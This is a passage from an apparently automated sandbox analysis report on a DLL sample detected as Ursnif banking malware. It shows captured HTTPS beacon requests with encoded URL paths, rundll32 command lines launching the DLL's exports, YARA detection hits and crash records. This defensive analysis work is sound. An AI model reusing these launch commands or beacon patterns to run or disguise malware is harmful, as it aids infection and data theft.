                                                                                                                                  Location: https://outlook.office365.com/signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84ucCmHqd/ux_2BgaSfPaBMcDfNjzb3/rbrRSArhJJpb3rOW/xdA1Wy83LoKT_2F/eny3XPOONMNlhwdGDb/HeEQC75Ox/PYv0ijHf_2BV06O4iZeM/ZM8mz_2FbpTp5AwODR0/XLpKCg0_2Ffc7auFjvx4p8/3b.jre
                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                  request-id: caa0db0f-9777-d9d1-3336-962544cc6f5d
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  X-FEServer: AM6P195CA0043
                                                                                                                                  X-RequestId: d14c0c8b-35f7-4987-9d6d-c2fe1a7d1a5a
                                                                                                                                  MS-CV: D9ugyneX0dkzNpYlRMxvXQ.0
                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                  X-FEServer: AM6P195CA0043
                                                                                                                                  Date: Mon, 11 Oct 2021 22:23:44 GMT
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  7192.168.2.34979852.97.151.66443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2021-10-11 22:23:44 UTC9OUTGET /signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84ucCmHqd/ux_2BgaSfPaBMcDfNjzb3/rbrRSArhJJpb3rOW/xdA1Wy83LoKT_2F/eny3XPOONMNlhwdGDb/HeEQC75Ox/PYv0ijHf_2BV06O4iZeM/ZM8mz_2FbpTp5AwODR0/XLpKCg0_2Ffc7auFjvx4p8/3b.jre HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                  Host: outlook.office365.com
                                                                                                                                  2021-10-11 22:23:44 UTC9INHTTP/1.1 404 Not Found
                                                                                                                                  Content-Length: 1245
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                  request-id: 404aa930-782f-c767-6fa8-22dabae1af7b
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Alt-Svc: h3=":443",h3-29=":443"
                                                                                                                                  X-CalculatedFETarget: VI1PR04CU006.internal.outlook.com
                                                                                                                                  X-BackEndHttpStatus: 404
                                                                                                                                  X-FEProxyInfo: VI1PR04CA0106.EURPRD04.PROD.OUTLOOK.COM
                                                                                                                                  X-CalculatedBETarget: VI1P191MB0174.EURP191.PROD.OUTLOOK.COM
                                                                                                                                  X-BackEndHttpStatus: 404
                                                                                                                                  X-RUM-Validated: 1
                                                                                                                                  X-Proxy-RoutingCorrectness: 1
                                                                                                                                  X-Proxy-BackendServerStatus: 404
                                                                                                                                  MS-CV: MKlKQC94Z8dvqCLauuGvew.1.1
                                                                                                                                  X-FEServer: VI1PR04CA0106
                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                  X-FEServer: AM6P191CA0036
                                                                                                                                  Date: Mon, 11 Oct 2021 22:23:43 GMT
                                                                                                                                  Connection: close
                                                                                                                                  2021-10-11 22:23:44 UTC10INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  8192.168.2.34984613.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2021-10-11 22:24:23 UTC11OUTGET /mail/liopolo/jpKr3VzL6CFU/K4QwQLlZ56e/n3MZDuNS62Sf0R/mD2lfs_2FQXwlgYrd0DFL/pEDSMAvGReZoZ8Jm/OSgzsTstfQRz_2F/2Bp8zA9yijiTKRH09Q/Mwm_2F7JH/xI5SfnAXURadBpSsyjtC/_2BEE4TT4VBjXUCp_2B/cYd5vNurcHADHrS6HheJd6/UAnImB8Jw2Ynr/9pKHwbRP/FStf.jre HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                  Host: msn.com
                                                                                                                                  2021-10-11 22:24:23 UTC12INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Location: https://www.msn.com/mail/liopolo/jpKr3VzL6CFU/K4QwQLlZ56e/n3MZDuNS62Sf0R/mD2lfs_2FQXwlgYrd0DFL/pEDSMAvGReZoZ8Jm/OSgzsTstfQRz_2F/2Bp8zA9yijiTKRH09Q/Mwm_2F7JH/xI5SfnAXURadBpSsyjtC/_2BEE4TT4VBjXUCp_2B/cYd5vNurcHADHrS6HheJd6/UAnImB8Jw2Ynr/9pKHwbRP/FStf.jre
                                                                                                                                  Server: Microsoft-IIS/8.5
                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Date: Mon, 11 Oct 2021 22:24:23 GMT
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 375
                                                                                                                                  2021-10-11 22:24:23 UTC12INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 6a 70 4b 72 33 56 7a 4c 36 43 46 55 2f 4b 34 51 77 51 4c 6c 5a 35 36 65 2f 6e 33 4d 5a 44 75 4e 53 36 32 53 66 30 52 2f 6d 44 32 6c 66 73 5f 32 46 51 58 77 6c 67 59 72 64 30 44 46 4c 2f 70 45 44 53 4d 41 76 47 52 65 5a 6f 5a 38 4a 6d 2f 4f 53 67 7a 73 54 73 74 66 51 52 7a 5f 32 46 2f 32 42 70 38 7a 41 39 79 69 6a 69 54 4b 52 48 30 39 51 2f 4d 77
                                                                                                                                  Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/jpKr3VzL6CFU/K4QwQLlZ56e/n3MZDuNS62Sf0R/mD2lfs_2FQXwlgYrd0DFL/pEDSMAvGReZoZ8Jm/OSgzsTstfQRz_2F/2Bp8zA9yijiTKRH09Q/Mw


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  9192.168.2.34984813.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2021-10-11 22:24:25 UTC13OUTGET /mail/liopolo/QXqV1Cwmdgy9RAxuvo/eyRDOSF4h/n5Xdvl6macAzIHUi6g_2/FnMxm3OFSbW9k15b3rD/GOZ7HTzmadDT3EaU6FMaux/8v8OfzSGDIfuI/2JFzbGpa/48oXcRIDJ4CWvryCIOce07l/PRm5ekLf_2/FWrUO776bg5a24LJQ/ndIkg4SZse4c/jL7OG2Z00xG/sTPur68E_2BxS_/2FjGzTP4SxNpm_2FiKI7j/WPoFKl4.jre HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                  Host: msn.com
                                                                                                                                  2021-10-11 22:24:25 UTC13INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Location: https://www.msn.com/mail/liopolo/QXqV1Cwmdgy9RAxuvo/eyRDOSF4h/n5Xdvl6macAzIHUi6g_2/FnMxm3OFSbW9k15b3rD/GOZ7HTzmadDT3EaU6FMaux/8v8OfzSGDIfuI/2JFzbGpa/48oXcRIDJ4CWvryCIOce07l/PRm5ekLf_2/FWrUO776bg5a24LJQ/ndIkg4SZse4c/jL7OG2Z00xG/sTPur68E_2BxS_/2FjGzTP4SxNpm_2FiKI7j/WPoFKl4.jre
                                                                                                                                  Server: Microsoft-IIS/8.5
                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Date: Mon, 11 Oct 2021 22:24:25 GMT
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 398
                                                                                                                                  2021-10-11 22:24:25 UTC14INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 51 58 71 56 31 43 77 6d 64 67 79 39 52 41 78 75 76 6f 2f 65 79 52 44 4f 53 46 34 68 2f 6e 35 58 64 76 6c 36 6d 61 63 41 7a 49 48 55 69 36 67 5f 32 2f 46 6e 4d 78 6d 33 4f 46 53 62 57 39 6b 31 35 62 33 72 44 2f 47 4f 5a 37 48 54 7a 6d 61 64 44 54 33 45 61 55 36 46 4d 61 75 78 2f 38 76 38 4f 66 7a 53 47 44 49 66 75 49 2f 32 4a 46 7a 62 47 70 61 2f
                                                                                                                                  Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/QXqV1Cwmdgy9RAxuvo/eyRDOSF4h/n5Xdvl6macAzIHUi6g_2/FnMxm3OFSbW9k15b3rD/GOZ7HTzmadDT3EaU6FMaux/8v8OfzSGDIfuI/2JFzbGpa/


                                                                                                                                  Code Manipulations

                                                                                                                                  Statistics

                                                                                                                                  Behavior

                                                                                                                                  Click to jump to process

                                                                                                                                  System Behavior

                                                                                                                                  Analysis Process: loaddll32.exe PID: 6444 Parent PID: 3120

                                                                                                                                  General

                                                                                                                                  Start time:00:20:49
                                                                                                                                  Start date:12/10/2021
                                                                                                                                  Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:loaddll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll'
                                                                                                                                  Imagebase:0x1240000
                                                                                                                                  File size:893440 bytes
                                                                                                                                  MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.828285916.0000000002F19000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.573182276.00000000034C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.575886663.00000000034C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.512556680.0000000000D50000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.574590732.00000000034C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.573615076.00000000034C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.828440646.00000000030D0000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.574198555.00000000034C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.573998703.00000000034C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.619056224.000000000334B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.573750690.00000000034C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.573091337.00000000034C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.707612619.000000000314F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.574533141.00000000034C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.664577952.000000000324D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  Reputation:moderate

                                                                                                                                  Analysis Process: cmd.exe PID: 6408 Parent PID: 6444

                                                                                                                                  General

                                                                                                                                  Start time:00:20:50
                                                                                                                                  Start date:12/10/2021
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                                                                                                                                  Imagebase:0xd80000
                                                                                                                                  File size:232960 bytes
                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: rundll32.exe PID: 4520 Parent PID: 6444

                                                                                                                                  General

                                                                                                                                  Start time:00:20:50
                                                                                                                                  Start date:12/10/2021
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass
                                                                                                                                  Imagebase:0xa10000
                                                                                                                                  File size:61952 bytes
                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.492790466.0000000002F30000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: rundll32.exe PID: 4352 Parent PID: 6408

                                                                                                                                  General

                                                                                                                                  Start time:00:20:50
                                                                                                                                  Start date:12/10/2021
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                                                                                                                                  Imagebase:0xa10000
                                                                                                                                  File size:61952 bytes
                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.829711196.0000000004CD0000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.577592974.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.577142287.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.621678183.0000000004F4B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.492597168.00000000008D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.829472336.0000000004949000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.576726243.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.577395162.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.578289206.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.576921901.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.711256543.0000000004D4F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.576829931.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.667981816.0000000004E4D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.577047375.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.576567742.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: rundll32.exe PID: 6952 Parent PID: 6444

                                                                                                                                  General

                                                                                                                                  Start time:00:20:55
                                                                                                                                  Start date:12/10/2021
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Fieldeight
                                                                                                                                  Imagebase:0xa10000
                                                                                                                                  File size:61952 bytes
                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.506220086.0000000000680000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: rundll32.exe PID: 6936 Parent PID: 6444

                                                                                                                                  General

                                                                                                                                  Start time:00:20:59
                                                                                                                                  Start date:12/10/2021
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Often
                                                                                                                                  Imagebase:0xa10000
                                                                                                                                  File size:61952 bytes
                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.512003320.00000000004D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: WerFault.exe PID: 6368 Parent PID: 4520

                                                                                                                                  General

                                                                                                                                  Start time:00:22:47
                                                                                                                                  Start date:12/10/2021
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 876
                                                                                                                                  Imagebase:0xd50000
                                                                                                                                  File size:434592 bytes
                                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: WerFault.exe PID: 3676 Parent PID: 6936

                                                                                                                                  General

                                                                                                                                  Start time:00:22:50
                                                                                                                                  Start date:12/10/2021
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 832
                                                                                                                                  Imagebase:0xd50000
                                                                                                                                  File size:434592 bytes
                                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: WerFault.exe PID: 5396 Parent PID: 6952

                                                                                                                                  General

                                                                                                                                  Start time:00:22:56
                                                                                                                                  Start date:12/10/2021
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 640
                                                                                                                                  Imagebase:0xd50000
                                                                                                                                  File size:434592 bytes
                                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: WerFault.exe PID: 1280 Parent PID: 6952

                                                                                                                                  General

                                                                                                                                  Start time:00:23:01
                                                                                                                                  Start date:12/10/2021
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 640
                                                                                                                                  Imagebase:0xd50000
                                                                                                                                  File size:434592 bytes
                                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  Disassembly

                                                                                                                                  Code Analysis

                                                                                                                                  Reset < >